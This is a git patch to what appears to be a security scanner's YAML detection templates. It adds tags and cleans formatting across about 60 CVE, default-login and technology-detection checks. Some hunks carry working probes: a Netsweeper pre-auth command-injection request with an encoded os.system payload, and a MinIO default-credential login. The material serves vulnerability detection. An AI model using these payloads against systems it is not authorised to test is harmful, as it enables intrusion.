From bd24dc198e0988824f27886147c55cf1ca949c08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 9 Sep 2021 19:08:13 +0530 Subject: [PATCH] Coverage for all templates using tags --- cves/2020/CVE-2020-12800.yaml | 1 + cves/2020/CVE-2020-13167.yaml | 4 +++- cves/2021/CVE-2021-3377.yaml | 1 + default-logins/minio/minio-default-password.yaml | 12 ++++++++---- .../prometheus-exposed-panel.yaml | 6 ++++-- exposures/configs/yii-debugger.yaml | 6 +++++- exposures/tokens/generic/shoppable-token.yaml | 1 + misconfiguration/front-page-misconfig.yaml | 1 + technologies/artica-web-proxy-detect.yaml | 4 ++++ technologies/basic-auth-detection.yaml | 1 + technologies/bigip-config-utility-detect.yaml | 1 + technologies/burp-api-detect.yaml | 1 + technologies/cacti-detect.yaml | 1 + technologies/clockwork-php-page.yaml | 2 ++ technologies/cockpit-detect.yaml | 1 + technologies/dell/dell-idrac6-detect.yaml | 2 ++ technologies/dell/dell-idrac7-detect.yaml | 2 ++ technologies/dell/dell-idrac8-detect.yaml | 2 ++ technologies/dell/dell-idrac9-detect.yaml | 2 ++ technologies/favicon-detection.yaml | 1 + technologies/firebase-detect.yaml | 2 ++ technologies/google-storage.yaml | 1 + technologies/graphql-detect.yaml | 1 + technologies/graylog-api-browser.yaml | 1 + technologies/gunicorn-detect.yaml | 4 +++- technologies/harbor-detect.yaml | 2 ++ technologies/home-assistant.yaml | 1 + technologies/ilo-detect.yaml | 1 + technologies/jaspersoft-detect.yaml | 1 + technologies/jellyfin-detect.yaml | 4 ++++ technologies/jolokia.yaml | 3 +++ technologies/kibana-detect.yaml | 1 + technologies/kong-detect.yaml | 1 + technologies/liferay-portal-detect.yaml | 2 ++ technologies/linkerd-badrule-detect.yaml | 8 ++------ technologies/lotus-domino-version.yaml | 2 ++ technologies/metabase-detect.yaml | 4 ++++ technologies/mrtg-detect.yaml | 2 ++ technologies/netsweeper-webadmin-detect.yaml | 1 + technologies/nginx-version.yaml | 3 +++ technologies/nifi-detech.yaml | 3 +++ technologies/oidc-detect.yaml | 2 ++ technologies/openam-detection.yaml | 1 + technologies/pi-hole-detect.yaml | 3 +++ technologies/prtg-detect.yaml | 2 ++ technologies/redmine-cli-detect.yaml | 1 + technologies/s3-detect.yaml | 1 + technologies/shiro-detect.yaml | 6 +++++- technologies/springboot-actuator.yaml | 4 ++++ technologies/sql-server-reporting.yaml | 1 + technologies/telerik-fileupload-detect.yaml | 2 ++ technologies/terraform-detect.yaml | 2 ++ technologies/tomcat-detect.yaml | 8 +++++--- technologies/tor-socks-proxy.yaml | 2 ++ technologies/weblogic-detect.yaml | 1 + technologies/werkzeug-debugger-detect.yaml | 1 + vulnerabilities/lsoft/listserv_maestro_rce.yaml | 1 + .../other/cacti-weathermap-file-write.yaml | 1 + .../other/caucho-resin-info-disclosure.yaml | 1 + vulnerabilities/other/pmb-local-file-disclosure.yaml | 1 + vulnerabilities/other/vpms-auth-bypass.yaml | 2 +- vulnerabilities/other/zms-auth-bypass.yaml | 1 + 62 files changed, 124 insertions(+), 20 deletions(-) rename {technologies => exposed-panels}/prometheus-exposed-panel.yaml (65%) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 4a4a96bb69..8216d0e966 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,7 @@ info: severity: critical description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 + tags: cve,cve2020,wordpress,wp-plugin requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index ffe6eb67a4..961d153f44 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -9,13 +9,15 @@ info: reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says + additional-fields: + hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' requests: - method: GET path: - # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" + headers: Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 77ded129f4..1b44686e3e 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -8,6 +8,7 @@ info: - https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27 author: geeknik severity: medium + tags: cve,cve2021,xss,npm requests: - raw: diff --git a/default-logins/minio/minio-default-password.yaml b/default-logins/minio/minio-default-password.yaml index 7d2b90fde6..12c46a6efe 100644 --- a/default-logins/minio/minio-default-password.yaml +++ b/default-logins/minio/minio-default-password.yaml @@ -4,23 +4,27 @@ info: name: Minio Default Password author: pikpikcu severity: medium + tags: default-login,minio requests: - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - method: POST path: - "{{BaseURL}}/minio/webrpc" + headers: Content-Type: application/json - body: | - {"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"} + + body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + matchers-condition: and matchers: diff --git a/technologies/prometheus-exposed-panel.yaml b/exposed-panels/prometheus-exposed-panel.yaml similarity index 65% rename from technologies/prometheus-exposed-panel.yaml rename to exposed-panels/prometheus-exposed-panel.yaml index b107509968..2cda5cc379 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/exposed-panels/prometheus-exposed-panel.yaml @@ -1,9 +1,11 @@ id: prometheus-exposed-panel + info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus + requests: - method: GET path: @@ -12,4 +14,4 @@ requests: matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' \ No newline at end of file diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 11232d47b1..e93bfbf58e 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml @@ -4,7 +4,8 @@ info: name: View Yii Debugger Information author: geeknik reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ - severity: info + severity: low + tags: yii,debug,exposure requests: - method: GET @@ -16,11 +17,14 @@ requests: - "{{BaseURL}}/sapi/debug/default/view" redirects: true + max-redirects: 2 + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Yii Debugger" diff --git a/exposures/tokens/generic/shoppable-token.yaml b/exposures/tokens/generic/shoppable-token.yaml index 0f68803be2..0c3d4080a0 100644 --- a/exposures/tokens/generic/shoppable-token.yaml +++ b/exposures/tokens/generic/shoppable-token.yaml @@ -5,6 +5,7 @@ info: author: philippedelteil severity: info reference: https://ask.shoppable.com/knowledge/quick-start-api-guide + tags: exposure,shoppable,token requests: - method: GET diff --git a/misconfiguration/front-page-misconfig.yaml b/misconfiguration/front-page-misconfig.yaml index 7e982772b0..8d49471b46 100644 --- a/misconfiguration/front-page-misconfig.yaml +++ b/misconfiguration/front-page-misconfig.yaml @@ -5,6 +5,7 @@ info: author: JTeles,pikpikcu severity: info reference: https://docs.microsoft.com/en-us/archive/blogs/fabdulwahab/security-protecting-sharepoint-server-applications + tags: misconfig,exposure,frontpage requests: - method: GET diff --git a/technologies/artica-web-proxy-detect.yaml b/technologies/artica-web-proxy-detect.yaml index 82b19cfb2d..8fd487f5ee 100644 --- a/technologies/artica-web-proxy-detect.yaml +++ b/technologies/artica-web-proxy-detect.yaml @@ -1,18 +1,22 @@ id: artica-web-proxy-detect + info: name: Artica Web Proxy Detect author: dwisiswant0 severity: info + tags: tech,artica,proxy requests: - method: GET path: - "{{BaseURL}}/fw.login.php" + matchers-condition: and matchers: - type: word words: - "Welcome to the Artica Web Administration Interface" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/basic-auth-detection.yaml b/technologies/basic-auth-detection.yaml index 66132d212e..894c3892d0 100644 --- a/technologies/basic-auth-detection.yaml +++ b/technologies/basic-auth-detection.yaml @@ -4,6 +4,7 @@ info: name: Basic auth detection author: w4cky_ severity: info + tags: tech,basic-auth requests: - method: GET diff --git a/technologies/bigip-config-utility-detect.yaml b/technologies/bigip-config-utility-detect.yaml index 4d3c250775..78b2741369 100644 --- a/technologies/bigip-config-utility-detect.yaml +++ b/technologies/bigip-config-utility-detect.yaml @@ -4,6 +4,7 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + tags: tech,bigip requests: - method: GET diff --git a/technologies/burp-api-detect.yaml b/technologies/burp-api-detect.yaml index 68a7000ee7..10cc8bcac8 100644 --- a/technologies/burp-api-detect.yaml +++ b/technologies/burp-api-detect.yaml @@ -5,6 +5,7 @@ info: author: joanbono severity: info reference: https://portswigger.net/burp/documentation/enterprise/api-reference + tags: burp,tech requests: - method: GET diff --git a/technologies/cacti-detect.yaml b/technologies/cacti-detect.yaml index 0a2a721928..9d1d018f12 100644 --- a/technologies/cacti-detect.yaml +++ b/technologies/cacti-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info + tags: tech,cacti requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 89ef10ba1b..a8537a2f36 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -1,9 +1,11 @@ id: clockwork-php-page + info: name: Clockwork PHP page exposure author: organiccrap severity: high reference: https://twitter.com/damian_89_/status/1250721398747791360 + tags: tech,clockwork requests: - method: GET diff --git a/technologies/cockpit-detect.yaml b/technologies/cockpit-detect.yaml index 30bf745acc..81dd323dc8 100644 --- a/technologies/cockpit-detect.yaml +++ b/technologies/cockpit-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info + tags: tech,cockpit requests: - method: GET diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index 9d8bb598ff..6f3c118b88 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac6-detect + info: name: Detect Dell iDRAC6 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index bddc00552b..220cfc4503 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac7-detect + info: name: Detect Dell iDRAC7 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index e25dc371e6..2fd72b97aa 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac8-detect + info: name: Detect Dell iDRAC8 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 7677292de5..f339b04905 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -1,9 +1,11 @@ id: dell-idrac9-detect + info: name: Detect Dell iDRAC9 author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info + tags: tech,dell requests: - method: GET diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 7394c9fff3..3cf1e620d8 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -10,6 +10,7 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + tags: tech,favicon requests: - method: GET diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fe3ff98b30..5c22ef8819 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -5,11 +5,13 @@ info: author: organiccrap severity: low reference: http://ghostlulz.com/google-exposed-firebase-database/ + tags: tech,firebase requests: - method: GET path: - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET" + matchers: - type: word words: diff --git a/technologies/google-storage.yaml b/technologies/google-storage.yaml index 27f4814a5b..95963c6a8c 100644 --- a/technologies/google-storage.yaml +++ b/technologies/google-storage.yaml @@ -4,6 +4,7 @@ info: name: Google Bucket detection author: 0xTeles severity: info + tags: tech,gstorage,google,bucket requests: - method: GET diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index ef649b7d06..53d67b1326 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -4,6 +4,7 @@ info: name: GraphQL API Detection author: NkxxkN,ELSFA7110 severity: info + tags: tech,graphql requests: - method: POST diff --git a/technologies/graylog-api-browser.yaml b/technologies/graylog-api-browser.yaml index 6c93a114fa..98799a87c0 100644 --- a/technologies/graylog-api-browser.yaml +++ b/technologies/graylog-api-browser.yaml @@ -4,6 +4,7 @@ info: name: Detect Graylog REST API author: PR3R00T severity: info + tags: tech,graylog requests: - method: GET diff --git a/technologies/gunicorn-detect.yaml b/technologies/gunicorn-detect.yaml index 69f286e77b..56f5080384 100644 --- a/technologies/gunicorn-detect.yaml +++ b/technologies/gunicorn-detect.yaml @@ -1,9 +1,11 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono description: Gunicorn Python WSGI HTTP Server for UNIX - https://github.com/benoitc/gunicorn severity: info + tags: tech,gunicorn requests: - method: GET @@ -22,4 +24,4 @@ requests: - type: kval part: header kval: - - Server + - Server \ No newline at end of file diff --git a/technologies/harbor-detect.yaml b/technologies/harbor-detect.yaml index e082b48acf..1ede65a8df 100644 --- a/technologies/harbor-detect.yaml +++ b/technologies/harbor-detect.yaml @@ -1,8 +1,10 @@ id: harbor-detect + info: name: Harbor Detect author: pikpikcu severity: info + tags: tech,harbor requests: - method: GET diff --git a/technologies/home-assistant.yaml b/technologies/home-assistant.yaml index 0522fc067b..dfb82e44b7 100644 --- a/technologies/home-assistant.yaml +++ b/technologies/home-assistant.yaml @@ -4,6 +4,7 @@ info: name: Detect Home Assistant author: fabaff severity: info + tags: tech,iot requests: - method: GET diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 70f0fc1e8d..6eeff924eb 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -5,6 +5,7 @@ info: author: milo2012 severity: info description: Version of HP iLO + tags: tech,ilo requests: - method: GET diff --git a/technologies/jaspersoft-detect.yaml b/technologies/jaspersoft-detect.yaml index 7cafc9a84d..e26ad12b3f 100644 --- a/technologies/jaspersoft-detect.yaml +++ b/technologies/jaspersoft-detect.yaml @@ -4,6 +4,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index ae031c20ca..9b31eaed43 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,7 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + tags: tech,jellyfin requests: - method: GET @@ -13,6 +14,8 @@ requests: - "{{BaseURL}}/index.html" - "{{BaseURL}}/web/index.html" - "{{BaseURL}}/web/manifest.json" + + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -22,6 +25,7 @@ requests: - "The Free Software Media System" condition: or part: body + - type: status status: - 200 diff --git a/technologies/jolokia.yaml b/technologies/jolokia.yaml index f6b28ff6ad..957b898273 100644 --- a/technologies/jolokia.yaml +++ b/technologies/jolokia.yaml @@ -4,11 +4,13 @@ info: name: Jolokia Version Disclosure author: mavericknerd,dwisiswant0 severity: info + tags: tech,jolokia requests: - method: GET path: - '{{BaseURL}}/jolokia/version' + matchers-condition: and matchers: - type: word @@ -17,6 +19,7 @@ requests: - '"protocol":' - '"agent":' condition: and + - type: status status: - 200 diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index c35b4dd301..c64939b6df 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -4,6 +4,7 @@ info: name: Kibana Service Detection author: petruknisme severity: info + tags: tech,kibana requests: - method: GET diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml index 6164d7c1cd..39e4d58bb7 100644 --- a/technologies/kong-detect.yaml +++ b/technologies/kong-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: The Cloud-Native API Gateway - https://github.com/Kong/kong severity: info + tags: tech,kong requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index ebf42ab88b..2a8de63c94 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -1,9 +1,11 @@ id: liferay-portal-detect + info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + tags: tech,liferay requests: - method: GET diff --git a/technologies/linkerd-badrule-detect.yaml b/technologies/linkerd-badrule-detect.yaml index 5e445af239..0e1ef8ff57 100644 --- a/technologies/linkerd-badrule-detect.yaml +++ b/technologies/linkerd-badrule-detect.yaml @@ -1,15 +1,11 @@ id: linkerd-badrule-detect -# Detect the Linkerd service by overriding the delegation table with an invalid -# rule, the presence of the service is indicated by either: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a literal error in the body - info: name: Linkerd detection via bad rule author: dudez severity: info + tags: tech,linkerd + reference: https://linkerd.io requests: - method: GET diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 3af4529ee9..897d6fad2e 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -1,8 +1,10 @@ id: lotus-domino-version + info: name: Lotus Domino Version Extractor author: CasperGN severity: info + tags: tech,lotus requests: - method: GET path: diff --git a/technologies/metabase-detect.yaml b/technologies/metabase-detect.yaml index 2b8c4cec7d..3a865ab0e7 100644 --- a/technologies/metabase-detect.yaml +++ b/technologies/metabase-detect.yaml @@ -1,13 +1,17 @@ id: metabase-version-detect + info: name: Detect Metabase Version author: revblock description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source severity: info + tags: tech,metabase + requests: - method: GET path: - "{{BaseURL}}/auth/login" + matchers-condition: and matchers: diff --git a/technologies/mrtg-detect.yaml b/technologies/mrtg-detect.yaml index 19a062f6fa..96f95f15d6 100644 --- a/technologies/mrtg-detect.yaml +++ b/technologies/mrtg-detect.yaml @@ -1,9 +1,11 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + tags: tech,mrtg requests: - method: GET diff --git a/technologies/netsweeper-webadmin-detect.yaml b/technologies/netsweeper-webadmin-detect.yaml index cc107c6ddc..04b545b315 100644 --- a/technologies/netsweeper-webadmin-detect.yaml +++ b/technologies/netsweeper-webadmin-detect.yaml @@ -4,6 +4,7 @@ info: name: Netsweeper WebAdmin detected author: dwisiswant0 severity: info + tags: tech,netsweeper requests: - method: GET diff --git a/technologies/nginx-version.yaml b/technologies/nginx-version.yaml index 9674f616ed..302d5d3d19 100644 --- a/technologies/nginx-version.yaml +++ b/technologies/nginx-version.yaml @@ -1,9 +1,12 @@ id: nginx-version + info: name: nginx version detect author: philippedelteil description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. severity: info + tags: tech,nginx + requests: - method: GET path: diff --git a/technologies/nifi-detech.yaml b/technologies/nifi-detech.yaml index 8e593cc440..837e4c43fd 100644 --- a/technologies/nifi-detech.yaml +++ b/technologies/nifi-detech.yaml @@ -4,6 +4,7 @@ info: name: Apache NiFi detect author: dwisiswant0 severity: info + tags: tech,apache,nifi requests: - method: GET @@ -15,6 +16,7 @@ requests: - "{{BaseURL}}/flow/registries" - "{{BaseURL}}/system-diagnostics" - "{{BaseURL}}/nifi-api/access/config" + matchers-condition: and matchers: - type: regex @@ -22,6 +24,7 @@ requests: - "supportsLogin" - "disconnectedNodeAcknowledged" - "(aggregate|node)Snapshots?" + - type: status status: - 200 diff --git a/technologies/oidc-detect.yaml b/technologies/oidc-detect.yaml index d8f65083d7..f87bf320d2 100644 --- a/technologies/oidc-detect.yaml +++ b/technologies/oidc-detect.yaml @@ -1,9 +1,11 @@ id: oidc-detect + info: name: Detect OpenID Connect provider author: jarijaas severity: info description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect + tags: tech,oidc requests: - method: GET diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index b3c603dde0..fd1653f20f 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -4,6 +4,7 @@ info: name: Detect OpenAM and OpenSSO author: philippedelteil severity: info + tags: tech,openam requests: - method: GET diff --git a/technologies/pi-hole-detect.yaml b/technologies/pi-hole-detect.yaml index 0f5cbcb052..22d1a56dca 100644 --- a/technologies/pi-hole-detect.yaml +++ b/technologies/pi-hole-detect.yaml @@ -1,8 +1,10 @@ id: pi-hole-detect + info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET @@ -14,6 +16,7 @@ requests: - type: status status: - 200 + - type: word words: - "Pi-hole" diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c57d90484d..c630eff289 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -1,9 +1,11 @@ id: prtg-detect + info: name: Detect PRTG author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info + tags: tech,prtg requests: - method: GET diff --git a/technologies/redmine-cli-detect.yaml b/technologies/redmine-cli-detect.yaml index 24a02349aa..8cb08b7888 100644 --- a/technologies/redmine-cli-detect.yaml +++ b/technologies/redmine-cli-detect.yaml @@ -4,6 +4,7 @@ info: author: geeknik description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ severity: info + tags: tech,redmine requests: - method: GET diff --git a/technologies/s3-detect.yaml b/technologies/s3-detect.yaml index fe617373af..3ed37bb68e 100644 --- a/technologies/s3-detect.yaml +++ b/technologies/s3-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info + tags: aws,s3,bucket,tech requests: - method: GET diff --git a/technologies/shiro-detect.yaml b/technologies/shiro-detect.yaml index 321f556a03..8353c48494 100644 --- a/technologies/shiro-detect.yaml +++ b/technologies/shiro-detect.yaml @@ -1,16 +1,20 @@ id: shiro-detect + info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro + requests: - method: GET path: - '{{BaseURL}}' headers: Cookie: rememberMe=123; + matchers: - type: word words: - - rememberMe=deleteMe + - 'rememberMe=deleteMe' part: header \ No newline at end of file diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml index 6bc4c9e7a1..ebc7edbe1e 100644 --- a/technologies/springboot-actuator.yaml +++ b/technologies/springboot-actuator.yaml @@ -4,13 +4,17 @@ info: name: Detect Springboot Actuators author: that_juan_,dwisiswant0,wdahlenb severity: info + tags: tech,springboot,actuator requests: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/actuator" - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/actuator/favicon.ico" + stop-at-first-match: true matchers-condition: or matchers: - type: word diff --git a/technologies/sql-server-reporting.yaml b/technologies/sql-server-reporting.yaml index 5b08ec1032..4b64c61e6f 100644 --- a/technologies/sql-server-reporting.yaml +++ b/technologies/sql-server-reporting.yaml @@ -4,6 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info + tags: tech,micrsoft requests: - method: GET diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik-fileupload-detect.yaml index 810cef7a8b..8f150d8b40 100644 --- a/technologies/telerik-fileupload-detect.yaml +++ b/technologies/telerik-fileupload-detect.yaml @@ -4,11 +4,13 @@ info: name: Detect Telerik Web UI fileupload handler author: organiccrap severity: info + tags: tech,telerik requests: - method: GET path: - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" + matchers: - type: word words: diff --git a/technologies/terraform-detect.yaml b/technologies/terraform-detect.yaml index 8c4d3307df..4a458c77e2 100644 --- a/technologies/terraform-detect.yaml +++ b/technologies/terraform-detect.yaml @@ -1,9 +1,11 @@ id: terraform-detect + info: name: Detect Terraform Provider author: geeknik description: Write Infrastructure as Code - https://www.terraform.io/ severity: info + tags: tech,terraform requests: - method: GET diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index d5a164932d..5561dba63d 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,10 +1,12 @@ -id: tomcat-version-detect +id: tomcat-version + info: name: Detect Tomcat Version author: philippedelteil - description: If an Tomcat instance is deployed on the target URL, when we send a request for - a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info + tags: tech,tomcat,apache + requests: - method: GET path: diff --git a/technologies/tor-socks-proxy.yaml b/technologies/tor-socks-proxy.yaml index ddbe880309..4957f092b8 100644 --- a/technologies/tor-socks-proxy.yaml +++ b/technologies/tor-socks-proxy.yaml @@ -1,8 +1,10 @@ id: tor-socks-proxy + info: name: Detect tor SOCKS proxy author: geeknik severity: info + tags: tech,tor,proxy requests: - method: GET diff --git a/technologies/weblogic-detect.yaml b/technologies/weblogic-detect.yaml index 6d290ac6f8..4effb62c55 100644 --- a/technologies/weblogic-detect.yaml +++ b/technologies/weblogic-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect Weblogic author: bing0o severity: info + tags: tech,weblogic requests: - method: GET diff --git a/technologies/werkzeug-debugger-detect.yaml b/technologies/werkzeug-debugger-detect.yaml index f11eac5435..aa90f4c1a3 100644 --- a/technologies/werkzeug-debugger-detect.yaml +++ b/technologies/werkzeug-debugger-detect.yaml @@ -4,6 +4,7 @@ info: name: Werkzeug debugger console author: pdteam severity: info + tags: tech,werkzeug requests: - method: GET diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3f04c30a27..56b6d5f00f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -8,6 +8,7 @@ info: reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + tags: rce,listserv,ognl requests: - method: GET diff --git a/vulnerabilities/other/cacti-weathermap-file-write.yaml b/vulnerabilities/other/cacti-weathermap-file-write.yaml index b8ebf42adb..04a5d1b654 100644 --- a/vulnerabilities/other/cacti-weathermap-file-write.yaml +++ b/vulnerabilities/other/cacti-weathermap-file-write.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: medium reference: https://www.freebuf.com/articles/system/125177.html + tags: injection,cacti requests: - method: GET diff --git a/vulnerabilities/other/caucho-resin-info-disclosure.yaml b/vulnerabilities/other/caucho-resin-info-disclosure.yaml index f4fa330ad9..04795427db 100644 --- a/vulnerabilities/other/caucho-resin-info-disclosure.yaml +++ b/vulnerabilities/other/caucho-resin-info-disclosure.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: info reference: https://www.exploit-db.com/exploits/27888 + tags: exposure,resin requests: - method: GET diff --git a/vulnerabilities/other/pmb-local-file-disclosure.yaml b/vulnerabilities/other/pmb-local-file-disclosure.yaml index 062d1759ab..a62783f871 100644 --- a/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDk 